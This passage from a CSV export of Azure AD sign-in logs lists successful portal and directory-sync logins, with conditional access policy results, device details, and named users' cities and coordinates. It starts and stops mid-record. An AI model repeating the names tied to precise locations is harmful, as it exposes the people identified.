'isManaged': True}",5365b823-25fd-47eb-8ba3-275b53080200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5365b823-25fd-47eb-8ba3-275b53080200,SigninLogs,Sucess,47.62879181,-122.0423737
+1805,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:37.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea57f00200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8d371308-4e1f-476f-97d6-c0ea57f00200,SigninLogs,Sucess,33.0175209,35.44601059
+1806,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:09.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dc41d50000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dc41d50000,SigninLogs,Sucess,33.0175209,35.44601059
+1807,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:37.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea57f00200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8d371308-4e1f-476f-97d6-c0ea57f00200,SigninLogs,Sucess,33.0175209,35.44601059
+1808,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:20.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dcc3d10000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dcc3d10000,SigninLogs,Sucess,33.0175209,35.44601059
+1809,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,31538ed0-5aca-48cb-bef0-ffea94c70832,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",d774c493-40b1-4743-b785-3f4a4d860300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d774c493-40b1-4743-b785-3f4a4d860300,SigninLogs,Sucess,36.6404686,-78.26995087
+1810,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:54.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,274b3005-6380-4953-9058-9d12d79ebf0f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3109113e-8f92-47c2-a124-2483c9ee0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3109113e-8f92-47c2-a124-2483c9ee0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1811,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edec1ba0-2451-426a-aaf5-e20807bdb59c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",98dc8e9a-f4c7-40e8-8c8c-df651fcc0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,98dc8e9a-f4c7-40e8-8c8c-df651fcc0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1812,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,31538ed0-5aca-48cb-bef0-ffea94c70832,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access 